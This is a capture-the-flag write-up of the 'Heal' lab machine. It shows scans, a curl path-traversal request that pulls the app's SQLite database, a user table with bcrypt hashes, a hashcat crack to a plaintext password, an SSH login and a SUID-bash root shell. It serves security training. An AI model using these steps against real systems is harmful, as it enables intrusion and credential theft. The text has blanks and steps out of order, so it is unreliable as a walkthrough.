Heal is a medium linux machine created by . The download pdf feature is vulnerable to PathTraversal vulnerability. The take-survey subdomain is using LimeSurvey and LimeSurvey admin login password is found in Rails on ruby config file which is fetched exploiting the Path Traversal vulnerability. The install plugin feature in LimeSurvey is vulnerable to RCE and exploited it to gain the reverse shell as www-data. The config file of LimeSurvey config file reveals the password and /home directory reveals the user. The password gives us access to the ron user. The hashicorp consul binary is running and the RCE vulnerability is created when malicious service is created . The vulnerability is exploited and gained the reverse shell as a root.
OS
Difficulty
Points
Release Date
Retired Date
Linux
Medium
30
14-12-2024
17-05-2025
Enumeration
Nmap
nmap -Pn -sC -sV --min-rate=1000 10.10.11.46
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 07:43 EDT
Nmap scan report for 10.10.11.46
Host is up (0.50s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 68:af:80:86:6e:61:7e:bf:0b:ea:10:52:d7:7a:94:3d (ECDSA)
|_ 256 52:f4:8d:f1:c7:85:b6:6f:c6:5f:b2:db:a6:17:68:ae (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://heal.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.54 seconds
Web - heal.htb
The website is resume builder and we have to create the account to create our resume. I have created the account and login as a test user. The form is presented to input our information to be presented in the resume.
At the bottom of the form the EXPORT AS PDF button is present. The /export and /downloadendpoints are requested and PDF is downloaded.
Intercepting the GET request from /download endpoint and sending it to the repeater in burp without forwarding it, then changing the value of filename parameter. The Path Traversal vulnerability is found.
Clicking SURVEY > TAKE THE SURVEY button the take-survey subdomain is found. The api.heal.htb is also requested during interacting with the site. Add take-survey and api subdomain in /etc/hosts file.
Web - api.heal.htb
It only returns the rails on ruby page with it's version.
Web - take-survey.heal.htb
The Next button takes to the form where we can write the about the features to be implemented, nothing interesting. The /endpoint takes to the LimeSurvey home page where LimeSurvey Administrator email is given for contact.
Fuzzing - Directories
feroxbuster -u http://take-survey.heal.htb -C 503 -n
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://take-survey.heal.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
💢 Status Code Filters │ [503]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🚫 Do Not Recurse │ true
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 7l 10w 162c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 101l 306w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 7l 12w 178c http://take-survey.heal.htb/admin => http://take-survey.heal.htb/admin/
301 GET 7l 12w 178c http://take-survey.heal.htb/tmp => http://take-survey.heal.htb/tmp/
301 GET 7l 12w 178c http://take-survey.heal.htb/modules => http://take-survey.heal.htb/modules/
301 GET 7l 12w 178c http://take-survey.heal.htb/editor => http://take-survey.heal.htb/editor/
200 GET 15l 56w 468c http://take-survey.heal.htb/tmp/assets/d8ad822d/scripts/custom.js
200 GET 36l 112w 803c http://take-survey.heal.htb/tmp/assets/d8ad822d/css/base.css
200 GET 1085l 4127w 75816c http://take-survey.heal.htb/
301 GET 7l 12w 178c http://take-survey.heal.htb/locale => http://take-survey.heal.htb/locale/
200 GET 1085l 4127w 75816c http://take-survey.heal.htb/Surveys
302 GET 0l 0w 0c http://take-survey.heal.htb/responses => http://take-survey.heal.htb/index.php/admin/authentication/sa/login
500 GET 1l 2w 45c http://take-survey.heal.htb/restrito
404 GET 0l 0w 0c http://take-survey.heal.htb/quebec
500 GET 1l 2w 45c http://take-survey.heal.htb/restrictor_log
401 GET 100l 294w 4569c http://take-survey.heal.htb/Uploader
[####################] - 7m 30051/30051 0s found:14 errors:112
[####################] - 7m 30000/30000 67/s http://take-survey.heal.htb/
The /admin directory is present. Visiting the /admin directory it redirects to /index.php/admin/authentication/sa/login which gives us the LimeSurvey login page.
Ruby Files - Path Traversal Exploit [ heal.htb ]
The api.heal.htb shows the ruby page and the application configuration file of ruby is present in /config/application.rb file.
Nothing much interesting but the application.rb file is fetched and that means the configuration for database file which is database.yml is also present.
database.yml
# SQLite. Versions 3.8.0 and up are supported.
# gem install sqlite3
#
# Ensure the SQLite 3 gem is defined in your Gemfile
# gem "sqlite3"
#
default: &default
adapter: sqlite3
pool: <%= ENV.fetch("RAILS_MAX_THREADS") { 5 } %>
timeout: 5000
development:
<<: *default
database: storage/development.sqlite3
# Warning: The database defined as "test" will be erased and
# re-generated from your development database when you run "rake".
# Do not set this db to the same as development or production.
test:
<<: *default
database: storage/test.sqlite3
production:
<<: *default
database: storage/development.sqlite3
The path to three sqlite3 file for development, test and production is present here. Downloading development.sqlite3 file.
curl 'http://api.heal.htb/download?filename=../../storage/development.sqlite3' -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoyfQ.73dLFyR_K1A7yY9uDP6xu7H1p_c7DlFQEoN1g-LFFMQ' -o development.sqlite3
file development.sqlite3
development.sqlite3: SQLite 3.x database, last written using SQLite version 3045002, writer version 2, read version 2, file counter 2, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 2
sqlite3 development.sqlite3
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .table
ar_internal_metadata token_blacklists
schema_migrations users
sqlite> SELECT * FROM users;
1|ralph@heal.htb|$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG|2024-09-27 07:49:31.614858|2024-09-27 07:49:31.614858|Administrator|ralph|1
2|test@heal.htb|$2a$12$zLdrtDmFgKTvutPQe0tDAuwNQ4Hs6GIlrXclavdN.dmMMFjMoSa9u|2025-05-24 00:47:54.397160|2025-05-24 00:47:54.397160|test|test|0
sqlite>
Enumerating the development database gives us the two users and their hashes. The second user account is the account created by me while building the resume in heal.htb. Cracking the hash using hashcat.
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-haswell-AMD Ryzen 3 7320U with Radeon Graphics, 2553/5170 MB (1024 MB allocatable), 8MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 72
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 0 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9SWx1GCSZnG:147258369
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$12$dUZ/O7KJT3.zE4TOK8p4RuxH3t.Bz45DSr7A94VLvY9S...GCSZnG
Time.Started.....: Fri May 23 21:38:52 2025 (15 secs)
Time.Estimated...: Fri May 23 21:39:07 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 34 H/s (7.37ms) @ Accel:8 Loops:16 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 512/14344385 (0.00%)
Rejected.........: 0/512 (0.00%)
Restore.Point....: 448/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4080-4096
Candidate.Engine.: Device Generator
Candidates.#1....: lover -> letmein
Hardware.Mon.#1..: Temp: 83c Util: 89%
Started: Fri May 23 21:38:46 2025
Stopped: Fri May 23 21:39:09 2025
Using the above password to login into the LimeSurvey.
The Account section gives us the LimeSurvey version.
ssh ron@10.10.11.46
The authenticity of host '10.10.11.46 (10.10.11.46)' can't be established.
ED25519 key fingerprint is SHA256:/VqroO/Kmxq00rboKFY9TylfAkNdJOiWIOBhnIA4VMs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.46' (ED25519) to the list of known hosts.
ron@10.10.11.46's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat May 24 12:38:35 PM UTC 2025
System load: 0.0
Usage of /: 74.0% of 7.71GB
Memory usage: 25%
Swap usage: 0%
Processes: 253
Users logged in: 1
IPv4 address for eth0: 10.10.11.46
IPv6 address for eth0: dead:beef::250:56ff:feb9:bf6a
Expanded Security Maintenance for Applications is not enabled.
29 updates can be applied immediately.
18 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sat May 24 11:51:32 2025 from 10.10.16.43
ron@heal:~$
ron@heal:~$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 2024 /bin/bash
ron@heal:~$ /bin/bash -p
bash-5.1# whoami
root
Proof of Concept
The below video provides the PoC of Heal machine.
Installing plugins in LimeSurvey can be used for RCE. The github user has created the github for exploiting LimeSurvey to gain RCE. Using the repository for getting shell.
Checking the process using ps aux reveals that the root is running .
